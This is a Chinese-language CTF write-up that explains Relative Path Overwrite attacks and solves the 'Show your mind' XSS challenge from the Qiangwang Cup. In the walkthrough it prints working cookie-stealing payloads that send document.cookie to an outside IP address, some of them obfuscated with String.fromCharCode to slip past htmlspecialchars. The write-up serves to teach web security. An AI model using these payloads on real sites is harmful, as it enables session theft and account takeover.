RPO相对路径覆盖攻击

强网杯Show your mind学习到了一个新的知识点,复现过程很有意思,总结一篇文章

0x1定义

RPO(Relative Path Overwrite)相对路径覆盖，是一种利用相对URL路径覆盖目标文件的一种攻击手段。

此攻击方法依赖于浏览器和服务器的反应，基于服务器的Web缓存技术和配置差异，以及服务器和客户端浏览器的解析差异，利用前端代码中加载的css/js的相对路径来加载其他文件，最终浏览器将服务器返回的不是css/js的文件当做css/js来解析，从而导致XSS，信息泄露等漏洞产生。

0x2 问题原因:

在Nginx中，编码后的url服务器可以正常识别，也就是说服务器在加载文件时会解码后找到具体文件返回返回客户端。但是在客户端识别url时是不会解码的,如果某些静态资源文件使用相对路径,就很容易遭受RPO相对路径覆盖攻击.

我们现在本地测试一下demo:

加入我们在/test/a.html中的内容为:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
    <script src="b.js">
    </script>
</head>
<body>
    
</body>
</html>

客户端加载的静态资源是/test目录下的b.js文件,内容为:

document.write('<p>Hello,World</p>');

如果我们控制test下面aaa的目录下面的b.js的内容,写入/test/aaa/b.js内容如下

alert(1)

我们如果访问链接:http://localhost/test/aaa/..%2fa.html, 弹窗,成功加载/test/aaa/b.js中的内容

image.png

这就是相对路径覆盖攻击, 我们成功覆盖掉了a.html中静态资源b.js的路径.

0x3. 漏洞利用的情景

0x3.1 加载任意目录下静态资源文件

如上demo演示,我们可以加载任意目录下的b.js去覆盖a.html中静态资源b.js的路径

0x3.2 将任意文件内容按静态文件解析

在很多使用了url_rewrite的php开发框架以及python web框架中，经常使用相对路径来加载静态资源文件，而且url都有一个特征:

index.php/home/controller/action/key1/value1/key2/value2...

比如一篇文章的链接为 index.php/view/article/41801/ view是index.php中的方法,article和41801分别是传入的参数名和参数值.

如果我们在其后加上..2f..%2f/这样路径会如何, 服务端正常解码后返回/index.php/view页面的内容,但客户端不会解码, 所有采用相对路径的静态资源文件的父路径变成了index.php/view/article/41801/, 而在这个链接后面加上的路径都会被当做参数来解析,最后返回的还是index.php/view/article/41801/文章的内容

这样我们就完成了将任意文件内容按静态文件来解析的漏洞利用了.

一道RPO攻击的CTF题目解析

强网杯上的一道show your mind的xss题目

登陆进去后可以利用的地方有add和reports页面,通过/templates/add.html 可以查看到输出点都用了htmlspecialchars转义，没法正常插入html代码，reports页面也只能提交自己网站上的链接，发现网站用了pathinfo模式，而且网站静态js文件采用相对路径来访问, 很符合RPO攻击的条件,我们来测试一下

首先我们写入一篇文章:

标题为空,内容为: alert(1)

生成一个文章路径:http://39.107.33.96:20000/index.php/view/article/41801

我们在这个文章路径后面加上/..%2f..%2f..%2f, 然后在访问

image.png

成功弹窗,这是为什么呢?

因为根路径:/index.php 中有一个静态文件是用相对路径表示的:

<script src="static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.min.js"></script>

当我们访问http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f..%2f链接的时候,服务端会正常解码, 跳转3个目录到index.php ,返回给我们对应的内容

问题来了, 客户端里的静态文件(css/js)如果是使用相对路径来表示的话, 如上,客户端并不会解码%2f, 而是将..%2f..%2f..%2f 当成一个文件来看待了, 那么上面那个js的相对路径就是http://39.107.33.96:20000/index.php/view/article/41801/

如果在`..%2f..%2f..%2f..%2f后加一个/,那么客户端就会当做一个目录,js的相对路径就不是/41801了

客户端寻找js的路径为:http://39.107.33.96:20000/index.php/view/article/41801/static/js/jquery.min.js

然而在pathinfo的模式下,static/js/jquery.min.js 会被当做参数,最后返回的还是该文章的页面,
即alert(1)的内容,这样相当于index.php中的js文件执行为:

<script src="http://39.107.33.96:20000/index.php/view/article/41801"></script>
<script src="http://39.107.33.96:20000/static/js/bootstrap.min.js"></script>

当然,在index.php/view中也存在相对路径,只不多是../static/js/jquery.min.js了, 同样是可以构造的: `http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f/``

这样服务端返回/index.php/view的内容, 客户端的静态文件加载的相对路径变成了http://39.107.33.96:20000/index.php/view/article/41801/..%2f..%2f/..static/js/jquery.min.js

验证完确实存在xss攻击点,
于是我们写一篇文章,

js代码为:

(new Image()).src="http://123.206.65.167:2000/?a="+escape(document.cookie);

因为htmlspecialchars函数转义引号,因此我们可以利用编码绕过, 写入内容如下:

eval(String.fromCharCode(40, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 49, 50, 51, 46, 50, 48, 54, 46, 54, 53, 46, 49, 54, 55, 58, 50, 48, 48, 48, 47, 63, 97, 61, 34, 43, 101, 115, 99, 97, 112, 101, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59))

将链接http://39.107.33.96:20000/index.php/view/article/708/..%2f..%2f/ 通过report页面发给管理员访问，拿到cookie:

image.png

在cookie中获取到HINT为: HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"
这里可以利用iframe指向该网页，因为窗口同源我们可以获取到子窗口的dom,因此写入内容如下:

<iframe src="/QWB_fl4g/QWB/" id="sir"></iframe><img src=0 onerror="this.src='http://123.206.65.167:2000/?a='+document.getElementById('sir').contentWindow.document.cookie">

编码为:

document.write(String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 47, 81, 87, 66, 95, 102, 108, 52, 103, 47, 81, 87, 66, 47, 34, 32, 105, 100, 61, 34, 115, 105, 114, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 60, 105, 109, 103, 32, 115, 114, 99, 61, 48, 32, 111, 110, 101, 114, 114, 111, 114, 61, 34, 116, 104, 105, 115, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 49, 50, 51, 46, 50, 48, 54, 46, 54, 53, 46, 49, 54, 55, 58, 50, 48, 48, 48, 47, 63, 97, 61, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 115, 105, 114, 39, 41, 46, 99, 111, 110, 116, 101, 110, 116, 87, 105, 110, 100, 111, 119, 46, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 34, 62))

注意上一个payload是js,所以可以直接用eval函数执行, 这个payload是html代码, 故用document.write函数写入到html dom中

发送给管理员链接，获取到该网页下的cookie:

image.png

内容为: flag=QWB{flag_is_f43kth4rpo}; HINT=Try to get the cookie of path "/QWB_fl4g/QWB/"

参考:

http://blog.nsfocus.net/rpo-attack/

http://www.beesfun.com/2017/03/27/RPO%E6%94%BB%E5%87%BB/